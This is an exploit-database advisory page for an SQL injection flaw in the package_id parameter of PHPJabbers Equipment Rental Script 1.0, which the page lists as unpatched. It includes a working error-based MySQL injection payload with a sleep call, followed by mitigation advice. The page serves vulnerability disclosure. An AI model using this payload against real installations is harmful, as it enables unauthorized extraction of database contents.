header-logo
Suggest Exploit
vendor:
Equipment Rental Script
by:
nu11secur1ty
6.1
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Equipment Rental Script
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: Not provided
CPE: a:phpjabbers:equipment_rental_script:1.0
Metasploit:
Other Scripts:
Platforms Tested:
2023

Equipment Rental Script-1.0 – SQL Injection

The package_id parameter in Equipment Rental Script-1.0 is vulnerable to SQL injection attacks. By submitting the payload ' in the package_id parameter, a database error message is returned. This vulnerability allows attackers to steal sensitive information from the database.

Mitigation:

To mitigate this vulnerability, input validation and sanitization techniques should be implemented to ensure that user-supplied data is safe for processing. Prepared statements or parameterized queries can also be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

## Title: Equipment Rental Script-1.0 - SQLi
## Author: nu11secur1ty
## Date: 09/12/2023
## Vendor: https://www.phpjabbers.com/
## Software: https://www.phpjabbers.com/equipment-rental-script/#sectionDemo
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The package_id parameter appears to be vulnerable to SQL injection
attacks. The payload ' was submitted in the package_id parameter, and
a database error message was returned. You should review the contents
of the error message, and the application's handling of other input,
to confirm whether a vulnerability is present. The attacker can steal
all information from the database!

[+]Payload:
mysql

Parameter: #1* ((custom) POST)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: package_id=(-4488))) OR 1 GROUP BY
CONCAT(0x71787a6a71,(SELECT (CASE WHEN (7794=7794) THEN 1 ELSE 0
END)),0x7176717671,FLOOR(RAND(0)*2)) HAVING
MIN(0)#from(select(sleep(20)))a)&cnt=2&date_from=12/9/2023&hour_from=11&minute_from=00&date_to=12/9/2023&hour_to=12&minute_to=00

## Reproduce:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Equipment-Rental-Script-1.0

System Administrator - Infrastructure Engineer
Penetration Testing Engineer
home page: https://www.nu11secur1ty.com/

Navigation

Suggest Exploit

Services By CQR